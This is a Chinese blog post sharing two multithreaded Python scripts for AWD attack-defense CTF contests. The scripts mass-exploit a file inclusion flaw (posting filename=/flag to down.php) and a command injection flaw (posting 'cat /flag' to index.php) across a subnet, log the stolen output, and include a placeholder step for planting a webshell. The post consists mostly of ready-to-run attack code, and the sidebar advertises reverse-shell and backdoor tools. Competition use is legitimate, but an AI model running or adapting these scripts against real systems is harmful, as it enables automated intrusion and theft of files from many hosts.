AWD攻击脚本-多线程-批量-打全场-保存flag

最新推荐文章于 2023-03-14 01:49:16 发布
最新推荐文章于 2023-03-14 01:49:16 发布
阅读量5.1k 收藏 55
点赞数 9
分类专栏: CTF/AWD Python 文章标签: AWD CTF 批量 多线程 攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q851579181q/article/details/101124311
版权

 

多线程批量attack全场,并输出、保存flag

 

一、针对文件包含漏洞的脚本

#!/usr/bin/env python
# encoding: utf-8

import requests
import urllib
import time
import threading

import base64

#批量Get_Flag
def init1():
    global headers123
    headers1243 = {
        'Accept': '*/*',
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.1; ',
        'Cache-Control': 'no-cache',
        'Content-Type': 'application/x-www-form-urlencoded',  # 保证post数据
        'Cookie': 'PHPSESSID = di3qm91mb32ni47sbqmqg6rgt7;'
        # 'Referer': 'https://www.baidu.com',
    }


#攻击的ip列表
def ip_list():
    global ip1
    ip1 = []
    for a in range(130, 150):
        #i = "172.20" + "." + str(a)+".101"
        i = "192.168.132."+str(a)
        ip1.append(i)

def get_flag(str1):
    s1 = str1.find('flag{')
    flag = str1[s1:s1 + 6 + 32]


def main():
    pass





def attack(ip):
    cookie='PHPSESSID=di3qm91mb32ni47sbqmqg6rgt7;'

    #----------------攻击
    header1 = {
        'Accept': '*/*',
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.1; ',
        'Cache-Control': 'no-cache',
        'Content-Type': 'application/x-www-form-urlencoded',  # 保证post数据
        'Cookie': cookie
        # 'Referer': 'https://www.baidu.com',
    }


    url_payload = '/down.php'
    url = 'http://' + str(ip) + '/' + url_payload
    #读取flag
    post_data = 'filename=/flag'
    

    try:
        content= requests.post(url,headers=header1,data=post_data,timeout=3)
        flag = content.text
        flag = flag.replace("\r","").replace("\n","")
        print flag
        #记录flag
        ip_log('flag1.txt', flag)

        #-1表示没找到
        #if flag.find('123') != -1:
        #    print "123123123123123213"
        #return content.text
    except Exception as e:
        #print str(ip) + ":Time out!"
        pass

    return 1
   


def flag_list():
    flag1={}

def ip_log(txt_name,content):
    try:
        f1 = open(txt_name, 'a')
        f1.write(content + "\r\n")
        f1.close()
    except Exception, e:
        print str(e)
        pass

if __name__ == '__main__':

    #设置上限线程数
    threads=1000

    #主机地址
    #ip_host="192.168.132.1"

    #初始化ip列表,列表名为ip1
    ip_list()

    #main()
    while 1:
        for ip in ip1:
            #print ip
            # 当线程过高,休息一会儿
            while (threading.activeCount() > threads):
                time.sleep(1)
           # print threading.activeCount()
            t1 = threading.Thread(target=attack, args=(ip,))
            t1.start()
            #t1.join(3)  # 3秒超时,但这个不能在最外层用,会拖慢线程



    print "结束"

#其实get的也可以只用post的方式

 

 

二、针对命令执行漏洞的脚本

#!/usr/bin/env python
# encoding: utf-8

import requests
import urllib
import time
import threading

#批量Get_Flag
def init1():
    global headers123
    headers1243 = {
        'Accept': '*/*',
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.1; ',
        'Cache-Control': 'no-cache',
        'Content-Type': 'application/x-www-form-urlencoded',  # 保证post数据
        'Cookie': 'PHPSESSID = di3qm91mb32ni47sbqmqg6rgt7;'
        # 'Referer': 'https://www.baidu.com',
    }


def ip_list():
    global ip1
    ip1 = []
    for a in range(2,255):
        #i = "172.20" + "." + str(a)+".101"
        i = "192.168.132."+str(a)
        ip1.append(i)

def get_flag(str1):
    s1 = str1.find('flag{')
    flag = str1[s1:s1 + 6 + 32]


def main():
    pass





def attack(ip):

    cookie='PHPSESSID=di3qm92mb33ni57sbqmqg6rgt7;'

    #----------------获取flag------------------------------------
    header1 = {
        'Accept': '*/*',
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.1; ',
        'Cache-Control': 'no-cache',
        'Content-Type': 'application/x-www-form-urlencoded',  # 保证post数据
        'Cookie': cookie
        # 'Referer': 'https://www.baidu.com',
    }
    url_payload = 'index.php'
    url = 'http://' + str(ip) + '/' + url_payload

    cmd = 'cat /flag'

    #执行系统命令要用system函数
    post_data = 'name='+cmd
    
    try:
        content= requests.post(url,headers=header1,data=post_data,timeout=3)

        flag = content.text
        print flag
        #flag = str(flag)
        print "-----------------------------------------"
        flag = flag.replace("<","")
        flag = flag.replace(">","")
        flag = flag.replace("/","")
        flag = flag.replace("\"","")
        ip_log('flag2.txt',flag)
        #return content.text
    except Exception as e:
        #print str(ip) + ":Time out!"
        pass




    #------写马--------------------------------------
  
    #马的内容
    cmd='xxx'
    post_data = 'name='+cmd
    try:
        content= requests.post(url,headers=header1,data=post_data,timeout=3)
        #print content.text
        #return content.text
    except Exception as e:
        #print str(ip) + str(e)
        pass





def ip_log(txt_name,content):
    try:
        f1 = open(txt_name, 'a')
        f1.write(content + "\r\n")
        f1.close()
    except Exception, e:
        print str(e)
        pass


if __name__ == '__main__':

    #设置上限线程数
    threads=1000

    #主机地址 作为回弹
    ip_host="192.168.132.11"

    #初始化ip列表,列表名为ip1
    ip_list()

    #main()
    while 1:
        for ip in ip1:
            #print ip
            # 当线程过高,休息一会儿
            while (threading.activeCount() > threads):
                time.sleep(1)
           # print threading.activeCount()
            t1 = threading.Thread(target=attack, args=(ip,))
            t1.start()
            #t1.join(3)  # 3秒超时,但这个不能在最外层用,会拖慢线程
        #exit()
    print "结束"
    #其实get的也可以只用post的方式

 

Blus.King
关注
  • 9
    点赞
  • 55
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全】CTF-AWD入门手册
2201_75857562的博客
02-02 1912
AWD赛制是一种网络安全竞赛的赛制。
S2 AWD排位赛-6.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
AWD攻防中读取flag批量脚本
09-05
AWD攻防中读取flag批量脚本,可能需要自行修改下
AWD比赛各类必备脚本
07-09
包括ip生成、kill、monitor、waf、不死马、反弹shell、后台flag读取、批量修改ssh、文件包含、文件上传、预留后门利用等AWD比赛常用的各种必备脚本
AWD批量拿分python脚本
05-12
根据网上版本修改的,现场更好更改参数的版本,减少AWD比赛时的代码修改量,原始版本是网上公有版本,个人觉得哪个版需要改的参数太多浪费了很多比赛时间,可以提前根据自己shell名称改好速度会更快
AWD监控脚本看别人怎么攻击
09-05
监控的脚本,看别人怎么攻击你的 然后你抓到他的流量去攻击别人
AWD自动提交flag脚本
09-01
AWD自动提交flag脚本
从红队视角看AWD攻击
二狗的博客
02-20 3356
使用了其中的Web1来进行演示预设后门为:http://localhost:8000/?对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
p80 红蓝对抗-AWD 模式&准备&攻防&监控&批量
weixin_43263566的博客
03-14 3236
p80 红蓝对抗-AWD 模式&准备&攻防&监控&批量
批量get_flag v3
weixin_30773135的博客
06-07 215
#!/usr/bin/env python # encoding: utf-8 from IPy import IP import requests import sys # 批量Get_Flag # IP地址处理,调用方法IPs("192.168.10.0/24")或IPs("192.168.10.0-20"),返回一个数组 def IPs(ip): IP...
文件包含批量攻击脚本
09-07
基础的文件包含,可以通过该脚本直接获取相应的flag,在awd中好用
awd-platform-master.zip
09-07
github上下载太慢了,特意搭飞机下回来给需要的人。项目大小是429.03M,下载了整整一个小时,项目是以docker的形式安装的,安装手册网上一大堆。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
awd-watchbird:适用于AWD的功能强大PHP WAF
03-19
请求参数(GET / POST)关键字特殊字符深度防御:响应检测/反向代理(默认将流量发送到本地服务器自检,可配置代理服务器IP和端口实现反代功能)响应flag检测并返回虚假flag基于LD_PRELOAD的指令执行保护基于open_...
CTF中压缩包解密的几种常见方式
热门推荐
BlusKing
12-10 4万+
  压缩包解密通用方法: 1.用winhex打开,搜索字符pass 、 key 等,查看是否有含有压缩包密码 2.如果要爆破: 先0-6位数字来一遍 3.如果爆破不成功可以根据题意或者社工 猜密码组合。例如某用户名叫王方,密码就有可能是wangfang123.     crc32爆破: 压缩包压缩文件会附带crc32校验码,如果字节长度比较短的话,可以尝试crc32爆破。 比方说...
2019强网杯 - 密码学-RSA-Coppersmith
BlusKing
05-28 1万+
Coppersmith 相关攻击 学习资料: https://ctf-wiki.github.io/ctf-wiki/crypto/asymmetric/rsa/rsa_coppersmith_attack/ https://code.felinae98.cn/ctf/crypto/rsa%E5%A4%A7%E7%A4%BC%E5%8C%85%EF%BC%88%E4%BA%8C%EF%BC%...
ZIP已知明文攻击深入利用
BlusKing
11-18 7445
首发在:https://www.freebuf.com/articles/network/255145.html 一、前言 你加密的压缩包比你想象中的还不安全! 哪怕对于信息安全人员来说,很多时候给压缩包加上一个密码就以为的是万事大吉了。但事实是,很多情况下,你的加密压缩包,远远没有你想象的安全。 二、内容概要 以往进行ZIP已知明文攻击,通常需要一个完整的明文文件。 而本文讨论的攻击方式只需要知道加密压缩包内容的12个字节,即可进行攻击破解降低了已知明文的攻击难度。同时,结合各类已知的...
bugku s2 awd排位赛-9
最新发布
12-07
bugku s2 awd排位赛-9是什么游戏名称的比赛呢?如果是bugku s2 awd排位赛-9这个比赛的名称,可以具体描述一下这个比赛的情况和内容吗?比如比赛的规则、参与者、赛程安排等等。这样我才能更好地回答你关于这个比赛的问题。 如果bugku s2 awd排位赛-9是某个游戏或竞赛的名称,我需要更多的信息才能准确地回答你的问题。比如是在哪个游戏平台上进行的比赛?参与者的胜负情况如何?有没有一些特殊的规则或要求?只有了解了这些信息,我才能为你提供确切的回答。 希望你能提供更多的细节,这样我才能帮助你更好地回答有关bugku s2 awd排位赛-9的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值